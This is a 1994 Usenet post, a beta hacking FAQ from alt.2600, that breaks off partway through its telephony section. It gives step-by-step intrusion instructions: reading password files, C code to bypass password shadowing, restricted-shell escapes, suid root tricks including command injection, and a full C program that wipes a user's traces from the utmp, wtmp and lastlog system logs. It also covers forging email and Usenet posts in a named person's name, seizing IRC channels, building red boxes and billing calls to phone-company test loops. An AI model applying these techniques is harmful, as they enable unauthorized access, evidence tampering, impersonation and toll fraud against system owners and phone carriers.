1352 lines
42 KiB
Plaintext
1352 lines
42 KiB
Plaintext
From tmok!paperboy.ids.net!uunet!spool.mu.edu!bloom-beacon.mit.edu!ai-lab!will Mon Jul 18 16:23:19 1994
|
|
Path: tmok!paperboy.ids.net!uunet!spool.mu.edu!bloom-beacon.mit.edu!ai-lab!will
|
|
From: will@gnu.ai.mit.edu (Will Spencer)
|
|
Newsgroups: alt.2600
|
|
Subject: #hack FAQ Beta .005
|
|
Date: 16 Jul 1994 17:17:03 GMT
|
|
Organization: Free Software Foundation / Cambridge, MA USA
|
|
Lines: 1339
|
|
Message-ID: <3094mfINN3d7@life.ai.mit.edu>
|
|
NNTP-Posting-Host: spiff.gnu.ai.mit.edu
|
|
|
|
|
|
Editors Note: Welcome to another beta release of the #hack FAQ!
|
|
This release features several improvements over .004,
|
|
although there is still much work to be done.
|
|
|
|
I may even run a spell checker over this thing before
|
|
the next release!
|
|
|
|
Please send constructive feedback to
|
|
will@gnu.ai.mit.edu. Flames to d_d@opus.tymnet.com.
|
|
|
|
Many sections are missing or incomplete. The #hack FAQ
|
|
comes with no warranties, express or implied.
|
|
|
|
|
|
|
|
|
|
|
|
** BETA **
|
|
|
|
#Hack F.A.Q.
|
|
by
|
|
Voyager
|
|
will@gnu.ai.mit.edu
|
|
|
|
With special thanks to:
|
|
|
|
A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow,
|
|
Major, Presence, Rogue Agent, sbin and TheSaint.
|
|
|
|
Beta Revision .005
|
|
|
|
|
|
Section A: Computers
|
|
|
|
01. How do I access the password file under Unix?
|
|
02. How do I crack Unix passwords?
|
|
03. How do I access the password file under VMS?
|
|
04. How do I crack VMS passwords?
|
|
05. What is NIS/yp?
|
|
06. What is password shadowing?
|
|
07. How do I break out of a restricted shell?
|
|
08. How do I gain root from a suid script or program?
|
|
09. How do I erase my presence from the system logs?
|
|
10. How do I send fakemail?
|
|
11. How do I fake posts to UseNet?
|
|
12. How do I hack ChanOp on IRC?
|
|
13. How do I modify the IRC client to hide my real username?
|
|
14. What is a trojan/worm/virus/logic bomb?
|
|
15. How can I protect myself from virii and such?
|
|
16. What is Cryptoxxxxxxx?
|
|
17. What is PGP?
|
|
18. What is Tempest?
|
|
|
|
|
|
Section B: Telephony
|
|
|
|
01. What is a Red Box?
|
|
02. How do I build a Red Box?
|
|
03. Which payphones will a Red Box work on?
|
|
04. What is a Blue Box?
|
|
05. Do Blue Boxes still work?
|
|
06. What is a Black Box?
|
|
07. What do all the colored boxes do?
|
|
08. What is the ANAC number for my area?
|
|
09. What is a ringback number?
|
|
10. What is the ringback number for my area?
|
|
11. What is a loop?
|
|
12. What is a loop in my area?
|
|
13. What is a CNA number?
|
|
14. What is the telephone company CNA number for my area?
|
|
15. What is scanning?
|
|
16. Is scanning illegal?
|
|
|
|
|
|
Section C: Resources
|
|
|
|
01. What are some ftp sites of interest to hackers?
|
|
02. What are some newsgroups of interest to hackers?
|
|
03. What are some telnet sites of interest to hackers?
|
|
04. What are some gopher sites of interest to hackers?
|
|
05. What are some World wide Web (WWW) sites of interest to hackers?
|
|
06. What are some IRC channels of interest to hackers?
|
|
07. What are some BBS's of interest to hackers?
|
|
08. What books are available on this subject?
|
|
|
|
|
|
Section D: Miscellaneous
|
|
|
|
01. What does XXX stand for?
|
|
|
|
|
|
|
|
Section A: Computers
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
|
|
01. How do I access the password file under Unix?
|
|
|
|
In standard Unix the password file is /etc/passwd. On a Unix system
|
|
with either NIS/yp or password shadowing, much of the password data
|
|
may be elsewhere.
|
|
|
|
|
|
02. How do I crack Unix passwords?
|
|
|
|
Contrary to popular belief, Unix passwords cannot be decrypted. Unix
|
|
passwords are encrypted with a one way function. The login program
|
|
encrypts the text you enter at the "password:" prompt and compares
|
|
that encrypted string against the encrypted form of your password.
|
|
|
|
Password cracking software uses wordlists. Each word in the wordlist
|
|
is encrypted with each of the 4096 possible salt values and the
|
|
results are compared to the encrypted form of the target password.
|
|
|
|
The best cracking program for Unix passwords is currently Crack by
|
|
Alec Muffett. For PC-DOS, the best package to use is currently
|
|
CrackerJack.
|
|
|
|
|
|
03. How do I access the password file under VMS?
|
|
|
|
Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
|
|
unlike Unix, most users do not have access to read the password file.
|
|
|
|
|
|
04. How do I crack VMS passwords?
|
|
|
|
Write a program that uses the SYS$GETUAF functions to compare the
|
|
results of encrypted words against the encrypted data in SYSUAF.DAT.
|
|
|
|
Two such programs are known to exist, CHECK_PASSWORD and
|
|
GUESS_PASSWORD.
|
|
|
|
|
|
05. What is NIS/yp?
|
|
|
|
NIS (Network Information System) in the current name for what was once
|
|
known as yp (Yellow Pages). The purpose for NIS is to allow many
|
|
machies on a network to share configuration information, including
|
|
password data. NIS is not designed to promote system security. If
|
|
your system uses NIS you will have a very short /etc/passwd file with
|
|
a line that looks like this:
|
|
|
|
+::0:0:::
|
|
|
|
To view the real password file use this command "ypcat passwd"
|
|
|
|
|
|
06. What is password shadowing?
|
|
|
|
Password shadowing is a security system where the encrypted password
|
|
field of /etc/password is replaced with a special token and the
|
|
encrypted password is stored in a seperate file which is not readable
|
|
by normal system users.
|
|
|
|
To defeat password shadowing on many (but not all) systems, write a
|
|
program that uses successive calls to getpwent() to obtain the
|
|
password file.
|
|
|
|
Example:
|
|
|
|
#include <pwd.h>
|
|
main()
|
|
{
|
|
struct passwd *p;
|
|
while(p=getpwent())
|
|
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
|
|
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
|
|
}
|
|
|
|
|
|
07. How do I break out of a restricted shell?
|
|
|
|
On poorly implemented restricted shells you can break out of the
|
|
restricted environment by running a program that features a shell
|
|
function. A good example is vi. Run vi and use this command:
|
|
|
|
:set shell=/bin/sh
|
|
|
|
then shell using this command:
|
|
|
|
:shell
|
|
|
|
|
|
08. How do I gain root from a suid script or program?
|
|
|
|
1. Change IFS.
|
|
|
|
If the program calls any other programs using the system() function
|
|
call, you may be able to fool it by changing IFS. IFS is the Internal
|
|
Field Seperator that the shell uses to delimit arguments.
|
|
|
|
If the program contains a line that looks like this:
|
|
|
|
system("/bin/date")
|
|
|
|
and you change IFS to '/' the shell will them interpret the
|
|
proceeding line as:
|
|
|
|
bin date
|
|
|
|
Now, if you have a program of your own in the path called "bin" the
|
|
suid program will run your program instead of /bin/date.
|
|
|
|
To change IFS, use this command:
|
|
|
|
set IFS '/'
|
|
|
|
|
|
2. link the script to -i
|
|
|
|
Create a symbolic link named "-i" to the program. Running "-i"
|
|
will cause the interpreter shell (/bin/sh) to start up in interactive
|
|
mode. This only works on suid shell scripts.
|
|
|
|
Example:
|
|
|
|
% ln suid.sh -i
|
|
% -i
|
|
#
|
|
|
|
|
|
3. Exploit a race condition
|
|
|
|
Replace a symbolic link to the program with another program while the
|
|
kernel is loading /bin/sh.
|
|
|
|
Example:
|
|
|
|
nice -19 suidprog ; ln -s evilprog suidroot
|
|
|
|
|
|
4. Send bad input the the program.
|
|
|
|
Invoke the name of the program and a seperate command on the same
|
|
command line.
|
|
|
|
Example:
|
|
|
|
suidprog ; id
|
|
|
|
|
|
09. How do I erase my presence from the system logs?
|
|
|
|
Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
|
|
files that can be edited by hand with vi, you must use a program
|
|
specifically written for this purpose.
|
|
|
|
Example:
|
|
|
|
#include <sys/types.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/file.h>
|
|
#include <fcntl.h>
|
|
#include <utmp.h>
|
|
#include <pwd.h>
|
|
#include <lastlog.h>
|
|
#define WTMP_NAME "/usr/adm/wtmp"
|
|
#define UTMP_NAME "/etc/utmp"
|
|
#define LASTLOG_NAME "/usr/adm/lastlog"
|
|
|
|
int f;
|
|
|
|
void kill_utmp(who)
|
|
char *who;
|
|
{
|
|
struct utmp utmp_ent;
|
|
|
|
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
|
|
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
|
|
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
}
|
|
close(f);
|
|
}
|
|
}
|
|
|
|
void kill_wtmp(who)
|
|
char *who;
|
|
{
|
|
struct utmp utmp_ent;
|
|
long pos;
|
|
|
|
pos = 1L;
|
|
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
|
|
|
|
while(pos != -1L) {
|
|
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
|
|
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
|
|
pos = -1L;
|
|
} else {
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
bzero((char *)&utmp_ent,sizeof(struct utmp ));
|
|
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
pos = -1L;
|
|
} else pos += 1L;
|
|
}
|
|
}
|
|
close(f);
|
|
}
|
|
}
|
|
|
|
void kill_lastlog(who)
|
|
char *who;
|
|
{
|
|
struct passwd *pwd;
|
|
struct lastlog newll;
|
|
|
|
if ((pwd=getpwnam(who))!=NULL) {
|
|
|
|
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
|
|
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
|
|
bzero((char *)&newll,sizeof( newll ));
|
|
write(f, (char *)&newll, sizeof( newll ));
|
|
close(f);
|
|
}
|
|
|
|
} else printf("%s: ?\n",who);
|
|
}
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
if (argc==2) {
|
|
kill_lastlog(argv[1]);
|
|
kill_wtmp(argv[1]);
|
|
kill_utmp(argv[1]);
|
|
printf("Zap2!\n");
|
|
} else
|
|
printf("Error.\n");
|
|
}
|
|
|
|
|
|
10. How do I send fakemail?
|
|
|
|
Telnet to port 25 of the machine you want the mail to appear to
|
|
originate from. Enter your message as in this example:
|
|
|
|
HELO bellcore.com
|
|
MAIL FROM:Voyagor@bellcore.com
|
|
RCPT TO:clinton@whitehouse.gov
|
|
DATA
|
|
|
|
Please discontinue your silly Clipper initiative.
|
|
.
|
|
QUIT
|
|
|
|
On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
|
|
line will not work. Test by sending yourself fakemail first.
|
|
|
|
|
|
11. How do I fake posts to UseNet?
|
|
|
|
Use inews to post. Give inews the following lines:
|
|
|
|
From:
|
|
Newsgroups:
|
|
Subject:
|
|
Message-ID:
|
|
Date:
|
|
Organization:
|
|
|
|
For a moderated newsgroup, inews will also require this line:
|
|
|
|
Approved:
|
|
|
|
Then add your post and terminate with <Control-D>.
|
|
|
|
Example:
|
|
|
|
From: Dale Drew
|
|
Newsgroups: alt.2600
|
|
Subject: Please forgive me
|
|
Message-ID: <d_drew.123@tymnet.com>
|
|
Date: Fri, 13 Jun 1994 12:15:03
|
|
Organization: Tymnet Insecurity
|
|
|
|
Please forgive me for being such a worthless puke all of these years.
|
|
|
|
Sincerely,
|
|
|
|
Bartman
|
|
^D
|
|
|
|
|
|
12. How do I hack ChanOp on IRC?
|
|
|
|
Find a server that is split from the rest of IRC and create your own
|
|
channel there using the name of the channel you want ChanOp on. When
|
|
that server reconnects to the net, you will have ChanOp on the real
|
|
channel. If you have ServerOp on a server, you can cause it to split
|
|
on purpose.
|
|
|
|
|
|
13. How do I modify the IRC client to hide my real username?
|
|
|
|
Get the IRC client from cs.bu.edu /irc/clients. Look at the source
|
|
code files irc.c and ctcp.c. The code you are looking for is fairly
|
|
easy to spot. Change it. Change the username code in irc.c and the
|
|
ctcp information code in ctcp.c. Compile and run your client.
|
|
|
|
|
|
14. What is a trojan/worm/virus/logic bomb?
|
|
|
|
Trojan: An independent program that appears to perform a useful
|
|
function but that hides another unauthorized program
|
|
inside it. When an authorized user performs the apparrent
|
|
function, the trojan horse performs the unauthorized
|
|
function as well (often usurping the priveleges of the
|
|
user).
|
|
|
|
Virus: A code fragment (not an independent program) that
|
|
reproduces by attaching to another program. It may damage
|
|
data directly, or it may degrade system performance by
|
|
taking over system resources which are then not available
|
|
to authorized users.
|
|
|
|
Worm: An independent program that reproduces by copying itself
|
|
from one system to another, usually over a network. Like
|
|
a virus, a worm may damage data directly, or it may
|
|
degrade system performace by tying up system resources and
|
|
even shutting down a network.
|
|
|
|
Logic Bomb: A method for releasing a system attack of some kind. It
|
|
is triggered when a particular condition (e.g., a certain
|
|
date or system operation) occurs.
|
|
|
|
|
|
15. How can I protect myself from virii and such?
|
|
|
|
|
|
16. What is Cryptoxxxxxxx?
|
|
|
|
This FAQ answer is excerpted from: Computer Security Basics
|
|
by Deborah Russell
|
|
and G.T. Gengemi Sr.
|
|
|
|
|
|
A message is called either plaintext or cleartext. The process of
|
|
disguising a message in such a way as to hide its substance is called
|
|
encryption. An encrypted message is called ciphertext. The process
|
|
of turning ciphertext back into plaintext is called decryption.
|
|
|
|
The art and science of keeping messages secure is called cryptography,
|
|
and it is practiced by cryptographers. Cryptanalysts are
|
|
practitioners of cryptanalysis, the art and science of breaking
|
|
ciphertext, i.e. seeing through the disguise. The branch of
|
|
mathematics embodying both cryptography and cryptanalysis is called
|
|
cryptology, and it's practitioners are called cryptologists.
|
|
|
|
|
|
17. What is PGP?
|
|
|
|
This FAQ answer is excerpted from: PGP(tm) User's Guide
|
|
Volume I: Essential Topics
|
|
by Philip Zimmermann
|
|
|
|
PGP(tm) uses public-key encryption to protect E-mail and data files.
|
|
Communicate securely with people you've never met, with no secure
|
|
channels needed for prior exchange of keys. PGP is well featured and
|
|
fast, with sophisticated key management, digital signatures, data
|
|
compression, and good ergonomic design.
|
|
|
|
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
|
|
high security cryptographic software application for MSDOS, Unix,
|
|
VAX/VMS, and other computers. PGP allows people to exchange files or
|
|
messages with privacy, authentication, and convenience. Privacy means
|
|
that only those intended to receive a message can read it.
|
|
Authentication means that messages that appear to be from a particular
|
|
person can only have originated from that person. Convenience means
|
|
that privacy and authentication are provided without the hassles of
|
|
managing keys associated with conventional cryptographic software. No
|
|
secure channels are needed to exchange keys between users, which makes
|
|
PGP much easier to use. This is because PGP is based on a powerful
|
|
new technology called "public key" cryptography.
|
|
|
|
PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
|
|
public key cryptosystem with the speed of conventional cryptography,
|
|
message digests for digital signatures, data compression before
|
|
encryption, good ergonomic design, and sophisticated key management.
|
|
And PGP performs the public-key functions faster than most other
|
|
software implementations. PGP is public key cryptography for the
|
|
masses.
|
|
|
|
|
|
18. What is Tempest?
|
|
|
|
Computers and other electonic equipment release interference to their
|
|
surrounding environment. You may observe this by placing two video
|
|
monitors close together. The pictures will behave erratically until
|
|
you space them apart.
|
|
|
|
Although most of the time these emissions are simply annoyances, they
|
|
can sometimes be very helpful. Suppose we wanted to see what project
|
|
a target was working on. We could sit in a van outside her office and
|
|
use sensitive electonic equipment to attempt to pick up and decipher
|
|
the emanations from her video monitor.
|
|
|
|
Our competetor, however, could shield the emanations from her
|
|
equipment or use equipment without strong emanations.
|
|
|
|
Tempest is the US Government program for evaluation and endorsement
|
|
of electronic equipment that is safe from eavesdropping.
|
|
|
|
|
|
Section B: Telephony
|
|
~~~~~~~~~~~~~~~~~~~~
|
|
|
|
01. What is a Red Box?
|
|
|
|
When a coin is inserted into a payphone, the phone emits a set of
|
|
tones. A red box is a device that simulates those tones, with the
|
|
purpose of fooling the payphone into believing you have inserted an
|
|
actual coin.
|
|
|
|
|
|
02. How do I build a Red Box?
|
|
|
|
Red boxes are commonly manufactured from modified Radio Shack tone
|
|
dialers, Hallmark greeting cards, or made from scratch from readily
|
|
available electronic components.
|
|
|
|
To make a Red Box from a Radio Shack 43-146 tone dialer, open the
|
|
dialer and replace the crystal (the largest shiny metal component)
|
|
with a crystal close to 6.5Mhz. The most popular choice is the
|
|
6.5536Mhz crystal. When you are finished, program the P1 button with
|
|
five *'s. That will simulate a quarter tone.
|
|
|
|
|
|
03. Which payphones will a Red Box work on?
|
|
|
|
Red Boxes will work on TelCo owned payphones, but not on COCOT's
|
|
(Customer Owned Coin Operated Telephones).
|
|
|
|
|
|
04. What is a Blue Box?
|
|
|
|
Blue boxes use a 2600hz tone to convince telephone switches that use
|
|
in-band signalling that the caller is actually a telephone operator.
|
|
The caller may then access special switch functions, with the usual
|
|
purpose of making free long distance phone calls, using the
|
|
Multi-Frequency tones provided by the Blue Box.
|
|
|
|
|
|
05. Do Blue Boxes still work?
|
|
|
|
Blue Boxes still work in areas using in-band signalling. Modern phone
|
|
signalling switches using ESS (Electronic Signalling Systems) use
|
|
out-of-band-signalling. Nothing you send over the voice portion of
|
|
bandwidth can control the switch.
|
|
|
|
|
|
06. What is a Black Box?
|
|
|
|
A Black Box is a 10k ohm resistor placed across your phone line to
|
|
cause the phone company equipment to be unable to detect that you have
|
|
answered your telephone. People who call you will then not be billed
|
|
for the telephone call.
|
|
|
|
|
|
07. What do all the colored boxes do?
|
|
|
|
Acrylic Steal Three-Way-Calling, Call Waiting and programmable
|
|
Call Forwarding on old 4-wire phone systems
|
|
Aqua Drain the voltage of the FBI lock-in-trace/trap-trace
|
|
Beige Lineman's hand set
|
|
Black Allows the calling party to not be billed for the call
|
|
placed
|
|
Blast Phone microphone amplifier
|
|
Blotto Supposedly shorts every fone out in the immediate area
|
|
Blue Emulate a true operator by siezing a trunk with a 2600hz
|
|
tone
|
|
Brown Create a party line from 2 phone lines
|
|
Bud Tap into your neighbors phone line
|
|
Chartreuse Use the electricity from your phone line
|
|
Cheese Connect two phones to create a divertor
|
|
Chrome Manipulate Traffic Signals by Remote Control
|
|
Clear A telephone pickup coil and a small amp use to make free
|
|
calls on Fortress Phones
|
|
Color Line activated telephone recorder
|
|
Copper Cause crosstalk interference on an extender
|
|
Crimson Hold button
|
|
Dark Re-route outgoing or incoming calls to another phone
|
|
Dayglo Connect to your neighbors phone line
|
|
Divertor Re-route outgoing or incoming calls to another phone
|
|
DLOC Create a party line from 2 phone lines
|
|
Gold Trace calls, tell if the call is being traced, and can
|
|
change a trace
|
|
Green Emulate the Coin Collect, Coin Return, and Ringback tones
|
|
Infinity Remotely activated phone tap
|
|
Jack Touch-Tone key pad
|
|
Light In-use light
|
|
Lunch AM transmitter
|
|
Magenta Connect a remote phone line to another remote phone line
|
|
Mauve Phone tap without cutting into a line
|
|
Neon External microphone
|
|
Noise Create line noise
|
|
Olive External ringer
|
|
Party Create a party line from 2 phone lines
|
|
Pearl Tone generator
|
|
Pink Create a party line from 2 phone lines
|
|
Purple Telephone hold button
|
|
Rainbow Kill a trace by putting 120v into the phone line (joke)
|
|
Razz Tap into your neighbors phone
|
|
Red Make free phone calls from pay phones by generating
|
|
quarter tones
|
|
Rock Add music to your phone line
|
|
Scarlet Cause a neighbors phone line to have poor reception
|
|
Silver Create the DTMF tones for A, B, C and D
|
|
Static Keep the voltage on a phone line high
|
|
Switch Add hold, indicator lights, conferencing, etc..
|
|
Tan Line activated telephone recorder
|
|
Tron Reverse the phase of power to your house, causing your
|
|
electric meter to run slower
|
|
TV Cable "See" sound waves on your TV
|
|
Urine Create a capacitative disturbance between the ring and
|
|
tip wires in another's telephone headset
|
|
Violet Keep a payphone from hanging up
|
|
White Portable DTMF keypad
|
|
Yellow Add an extension phone
|
|
|
|
|
|
08. What is the ANAC number for my area?
|
|
|
|
How to find your ANAC number:
|
|
|
|
Look up your NPA (Area Code) and try the number listed for it. If that
|
|
fails, try 1 plus the number listed for it. If that fails, try the
|
|
common numbers like 311, 958 and 200-222-2222. If that fails, try the
|
|
nationwide ANAC number 404-988-9664. If you find the ANAC number for
|
|
your area, please let us know.
|
|
|
|
Note that many times the ANAC number will vary for different
|
|
switches in the same city.
|
|
|
|
A trick to getting the number of the phone line you are calling from
|
|
is to call an (800) phone sex line. Example: (800)571-8859. These
|
|
systems will give you an account number, which in many cases includes
|
|
the telephone number of the phone from which you are calling.
|
|
|
|
Another useful 800 ANAC number is the Duke Power Company Automated
|
|
Outage System at (800)769-3766. The system will read back to you
|
|
the phone number from which you are calling.
|
|
|
|
Please use local ANAC numbers if you can, as abuse or overuse kills
|
|
800 ANAC numbers.
|
|
|
|
NPA ANAC number Comments
|
|
--- --------------- ---------------------------------------------
|
|
201 958 Hackensack/Jersey City/Newark/Paterson, NJ
|
|
202 958-xxxx Dictrict of Columbia
|
|
203 960 CT (All)
|
|
203 970 CT (All)
|
|
204 644-xxxx Manitoba
|
|
205 908-222-2222 Birmingham, AL
|
|
206 411 WA /* Not US West */
|
|
207 958 ME (All)
|
|
209 830 Stockton, CA
|
|
212 958 Manhattan, NY
|
|
213 114 Los Angeles, CA
|
|
213 1223 Los Angeles, CA /* some 1AESS switches */
|
|
213 211-2345 Los Angeles, CA /* English response */
|
|
213 211-2346 Los Angeles, CA /* DTMF response */
|
|
213 61056 Los Angeles, CA
|
|
214 790 Dallas, TX /* GTE */
|
|
214 970-222-2222 Dallas, TX
|
|
214 970-611-1111 Dallas, TX /* Southwestern Bell */
|
|
215 410-xxxx Philadelphia, PA
|
|
217 200-xxx-xxxx Champaign-Urbana/Springfield, IL
|
|
301 958-9968 Hagerstown/Rockville, MD
|
|
305 200-222-2222 Ft. Lauderdale/Key West/Miami, FL
|
|
309 200-xxx-xxxx Peoria/Rock Island, IL
|
|
310 114 Long Beach, CA /* on many GTE switches */
|
|
310 1223 Long Beach, CA /* some 1AESS switches */
|
|
310 211-2345 Long Beach, CA /* English response */
|
|
310 211-2346 Long Beach, CA /* DTMF response */
|
|
312 1-200-5863 Chicago, IL
|
|
312 200-xxx-xxxx Chicago, IL
|
|
312 290 Chicago, IL
|
|
313 200-200-2002 Ann Arbor/Dearborn/Detroit, MI
|
|
313 200-222-2222 Ann Arbor/Dearborn/Detroit, MI
|
|
313 200-xxx-xxxx Ann Arbor/Dearborn/Detroit, MI
|
|
313 200200200200200 Ann Arbor/Dearborn/Detroit, MI
|
|
314 511 Columbia/Jefferson City, MO
|
|
317 310-222-2222 Indianapolis/Kokomo, IN
|
|
317 743-1218 Indianapolis/Kokomo, IN
|
|
401 222-2222 RI (All)
|
|
402 311 Lincoln, NE
|
|
403 311 Alberta, Yukon and N.W. Territory
|
|
403 908-222-2222 Alberta, Yukon and N.W. Territory
|
|
403 999 Alberta, Yukon and N.W. Territory
|
|
404 311 Atlanta, GA
|
|
404 940-xxx-xxxx Atlanta, GA
|
|
405 897 Enid/Oklahoma City, OK
|
|
407 200-222-2222 Orlando/West Palm Beach, FL
|
|
408 300-xxx-xxxx San Jose, CA
|
|
408 760 San Jose, CA
|
|
408 940 San Jose, CA
|
|
409 951 Beaumont/Galveston, TX
|
|
409 970-xxxx Beaumont/Galveston, TX
|
|
410 200-555-1212 Annapolis/Baltimore, MD
|
|
410 811 Annapolis/Baltimore, MD
|
|
412 711-6633 Pittsburgh, PA
|
|
412 711-4411 Pittsburgh, PA
|
|
412 999-xxxx Pittsburgh, PA
|
|
413 958 Pittsfield/Springfield, MA
|
|
413 200-555-5555 Pittsfield/Springfield, MA
|
|
414 330-2234 Fond du Lac/Green Bay/Milwaukee/Racine, WI
|
|
415 200-555-1212 San Francisco, CA
|
|
415 211-2111 San Francisco, CA
|
|
415 2222 San Francisco, CA
|
|
415 640 San Francisco, CA
|
|
415 760-2878 San Francisco, CA
|
|
415 7600-2222 San Francisco, CA
|
|
419 311 Toledo, OH
|
|
502 997-555-1212 Frankfort/Louisville/Paducah/Shelbyville, KY
|
|
503 611 Portland, OR /* not all parts of town */
|
|
508 958 Fall River/New Bedford/Worchester, MA
|
|
508 200-222-1234 Fall River/New Bedford/Worchester, MA
|
|
508 200-222-2222 Fall River/New Bedford/Worchester, MA
|
|
509 560 Spokane/Walla Walla/Yakima, WA
|
|
512 200-222-2222 Austin/Corpus Christi, TX
|
|
512 830 Austin/Corpus Christi, TX
|
|
512 970-xxxx Austin/Corpus Christi, TX
|
|
514 320-xxxx Montreal, Quebec
|
|
515 5463 Des Moines, IA
|
|
516 958 Hempstead/Long Island, NY
|
|
516 968 Hempstead/Long Island, NY
|
|
517 200-222-2222 Bay City/Jackson/Lansing, MI
|
|
517 200200200200200 Bay City/Jackson/Lansing, MI
|
|
518 997 Albany/Schenectady/Troy, NY
|
|
518 998 Albany/Schenectady/Troy, NY
|
|
602 593-0809 Phoenix, AZ
|
|
602 593-6017 Phoenix, AZ
|
|
602 593-7451 Phoenix, AZ
|
|
603 200-222-2222 NH (All)
|
|
606 997-555-1212 Ashland/Winchester, KY
|
|
607 993 Binghamton/Elmira, NY
|
|
609 958 Atlantic City/Camden/Trenton/Vineland, NJ
|
|
612 511 Minneapolis/St.Paul, MN
|
|
615 200200200200200 Nashville, TN
|
|
615 830 Nashville, TN
|
|
616 200-222-2222 Battle Creek/Grand Rapids/Kalamazoo, MI
|
|
617 200-222-1234 Boston, MA
|
|
617 200-222-2222 Boston, MA
|
|
617 200-444-4444 Boston, MA /* Woburn, MA */
|
|
617 220-2622 Boston, MA
|
|
617 958 Boston, MA
|
|
618 200-xxx-xxxx Alton/Cairo/Mt.Vernon, IL
|
|
708 1-200-xxxx Chicago/Elgin, IL
|
|
713 970-xxxx Houston, TX
|
|
714 211-2121 Anaheim, CA /* GTE */
|
|
716 511 Buffalo/Niagra Falls/Rochester, NY /* Rochester Tel */
|
|
717 958 Harrisburg/Scranton/Wilkes-Barre, PA
|
|
718 958 Bronx/Brooklyn/Queens/Staten Island, NY
|
|
802 2-222-222-2222 Vermont (All)
|
|
802 200-222-2222 Vermont (All)
|
|
805 830 San Luis Obispo, CA
|
|
806 970-xxxx Amarillo/Lubbock, TX
|
|
810 200200200200200 Michigan
|
|
812 410-555-1212 Evansville, IN
|
|
815 200-xxx-xxxx La Salle/Rockford, IL
|
|
815 290 La Salle/Rockford, IL
|
|
817 211 Ft. Worth/Waco, TX
|
|
817 970-611-1111 Ft. Worth/Waco, TX /* Southwestern Bell */
|
|
818 1223 Pasadena, CA /* some 1AESS switches */
|
|
818 211-2345 Pasadena, CA /* English response */
|
|
818 211-2346 Pasadena, CA /* DTMF response */
|
|
906 200-222-2222 Marquette/Sault Ste. Marie, MI
|
|
908 958 New Brunswick, NJ
|
|
910 311 Fayetteville/Greensboro/Raliegh/Winston-Salem, NC
|
|
914 990-1111 Peekskill/Poughkeepsie/White Plains/Yonkers, NY
|
|
915 970-xxxx Abilene/El Paso, TX
|
|
919 711 Durham, NC
|
|
|
|
|
|
Canada:
|
|
306 115 Saskatchewan, Canada
|
|
416 410-xxxx Toronto, Ontario
|
|
416 997-xxxx Toronto, Ontario
|
|
519 320-xxxx London, Ontario
|
|
604 1116 British Columbia, Canada
|
|
604 1211 British Columbia, Canada
|
|
604 211 British Columbia, Canada
|
|
613 320-2232 Ottawa, Ontario
|
|
705 320-xxxx Saulte Ste. Marie, Ontario
|
|
|
|
Australia:
|
|
+61 03-552-4111 Victoria 03 area
|
|
+61 19123 All major capital cities
|
|
|
|
|
|
09. What is a ringback number?
|
|
|
|
A ringback number is a number that you call that will immediately
|
|
ring the telephone from which it was called.
|
|
|
|
In most instances you must call the ringback number, quickly hang up
|
|
the phone for just a short moment and then let up on the switch, you
|
|
will then go back off hook and hear a different tone. You may then
|
|
hang up. You will be called back seconds later.
|
|
|
|
|
|
10. What is the ringback number for my area?
|
|
|
|
203 991-xxxx CT (All)
|
|
209 890-xxxx Stockton, CA
|
|
213 1-95x-xxxx Los Angeles, CA
|
|
303 99X-xxxx Grand Junction, CO
|
|
312 200-xxxx Chicago, IL
|
|
412 985-xxxx Pittsburgh, PA
|
|
416 57x-xxxx Toronto, Ontario
|
|
416 99x-xxxx Toronto, Ontario
|
|
416 999-xxx-xxxx Toronto, Ontario
|
|
502 988 Lexington, KY
|
|
512 95X-xxxx Austin, TX
|
|
514 320-xxxx Montreal, Quebec
|
|
601 777-xxxx MS (All)
|
|
619 331-xxxx San Diego, CA
|
|
619 332-xxxx San Diego, CA
|
|
716 981-xxxx Rochester, NY /* Rochester Tel */
|
|
801 938-xxxx Utah (All)
|
|
801 939-xxxx Utah (All)
|
|
|
|
|
|
11. What is a loop?
|
|
|
|
This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
|
|
by Minor Threat & Mucho Maas
|
|
|
|
Loops are a pair of phone numbers, usually consecutive, like 836-9998
|
|
and 836-9999. They are used by the phone company for testing. What
|
|
good do loops do us? Well, they are cool in a few ways. Here is a
|
|
simple use of loops. Each loop has two ends, a 'high' end, and a
|
|
'low' end. One end gives a (usually) constant, loud tone when it is
|
|
called. The other end is silent. Loops don't usually ring either.
|
|
When BOTH ends are called, the people that called each end can talk
|
|
through the loop. Some loops are voice filtered and won't pass
|
|
anything but a constant tone; these aren't much use to you. Here's
|
|
what you can use working loops for: billing phone calls! First, call
|
|
the end that gives the loud tone. Then if the operator or someone
|
|
calls the other end, the tone will go quiet. Act like the phone just
|
|
rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
|
|
what the fuck ever. The operator thinks that she just called you, and
|
|
that's it! Now the phone bill will go to the loop, and your local
|
|
RBOC will get the bill! Use this technique in moderation, or the loop
|
|
may go down. Loops are probably most useful when you want to talk to
|
|
someone to whom you don't want to give your phone number.
|
|
|
|
|
|
12. What is a loop in my area?
|
|
|
|
Many of these loops are no longer functional. If you are local
|
|
to any of these loops, please try them out an e-mail me the results
|
|
